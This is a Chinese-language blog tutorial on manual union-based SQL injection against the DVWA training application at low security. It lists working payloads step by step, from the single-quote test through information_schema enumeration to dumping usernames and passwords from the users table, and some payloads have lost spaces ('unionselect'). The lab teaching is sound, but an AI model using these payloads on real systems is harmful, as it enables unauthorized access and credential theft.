一、前言

最近正在學習SQL注入，縱觀各種教程，有稍微講解一下直接po步驟的，有對原理講的很仔細的但步驟不明確的，因此便想做一個教程，將每一步寫清楚，將思路理順，讓SQL注入入門不再困難，建議在閱讀本文之前閱讀本人的《SQL注入入門》系列文章，裡面有一些原理性的講解，對理解本文有幫助

因為主要做的是思路講解，因此這裡採用DVWA的low級別的SQL Injection來做演示，在嘗試進行其他的SQL注入的過程中，並不會太順利，一定會有一些讓你停下來細細思考的點，不斷尋找突破口，最終達到目的，享受在這個過程中的頭腦風暴吧！

二、正文

Step1正常輸入

Step2判斷是否存在SQL注入漏洞

一般來說我們先進行單引號測試

伺服器返回錯誤，顯然並未對單引號作過濾的處理，判斷存在SQL注入漏洞

Step3判斷注入的型別

判斷注入為數字型還是字元型，一般來說我們考慮這種分類方式

嘗試數字型：輸入2-1進行測試

顯然，如果是數字型注入，這裡顯現的結果應該等同於ID=1的情況，據此判斷不是數字型，保守起見，我們繼續判斷是否為字元型注入

（此處資料庫為MySQL資料庫）

嘗試字元型：輸入1' or'1'='2

如果是字元型，顯然會輸入ID=1的結果

結論：存在字元型注入

Step3猜解查詢欄位的個數

我們需要猜測在這裡存在的查詢語句的形式，以便我們的下一步操作

首先我們猜

1' union select 1;-- (

結果如上，因此繼續嘗試

1' unionselect 1,2;#

因此我們可以知道該查詢語句中有兩個欄位

於是我們猜測的SELECT語句是這樣的：

SELECT First name,Surname

FROM表

WHEREid='$_GET(xxxx)';

Step4嘗試通過SQL注入查詢出使用者名稱與密碼等敏感資訊

1)獲取當前資料庫名

1' unionselect 1,database()#

因為前面我們知道，select語句有兩個欄位，因此需要填寫兩個，1和database()，後者是我們想要的

可以發現，資料庫名為

2)獲取資料庫表名

1'union select 1,table_name frominformation_schema.tables where table_schema=database()#

這裡解釋一下該語句的意思

table_name,table_shema都是MySQL的"conditioninformation item name"，簡單而又不恰當的理解就是系統定義的變數，table_name表示表名，table_schema表示資料庫名稱

關於information_schema的用法可以看我的另一個文章，《MySQL資料庫元資料簡要說明》

傳送門：http://blog.csdn.net/qq_35544379/article/details/77161490

我們可以看到，資料庫表名有guestbook和users兩個

為了方便展示，我們可以採用sql提供給我們的字串連線函式

GROUP_CONCAT（）函式，它返回一個字串結果，該結果由分組中的值連線組合而成。

在我另一個文章裡也有詳細說明http://blog.csdn.net/qq_35544379/article/details/77099115

例如上面我們可以寫成

1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

這樣一來，我們想要的資料便在一行中展示出來了。

3)獲取表中的列名

在上面，我們知道了該資料庫中存在兩個表guestbook,users

顯然我們想要的使用者名稱和密碼應該會在users中，因此接下來我們想知道，在這個表中，存在哪些列？

我們可以這樣

1' unionselect 1,group_concat(column_name) from information_schema.columns wheretable_name='users'#

結果我們發現了我們想要的夢寐以求的user，password列

4）獲取password資訊

好了，只差臨門一腳了。

經過上面兩次的訓練，我們很簡單可以寫出下面的語句，由於可能結果很多，我們就不使用group_concat()這個函數了，轉而使用concat()，兩者的區別是前者返回一條字串結果（n個結果結合一起的字串），後者將每一條結果分開

1' unionselect 1,concat(user_id,',',user,',',password) from users#

成功獲得我們想要的使用者名稱和密碼！！！！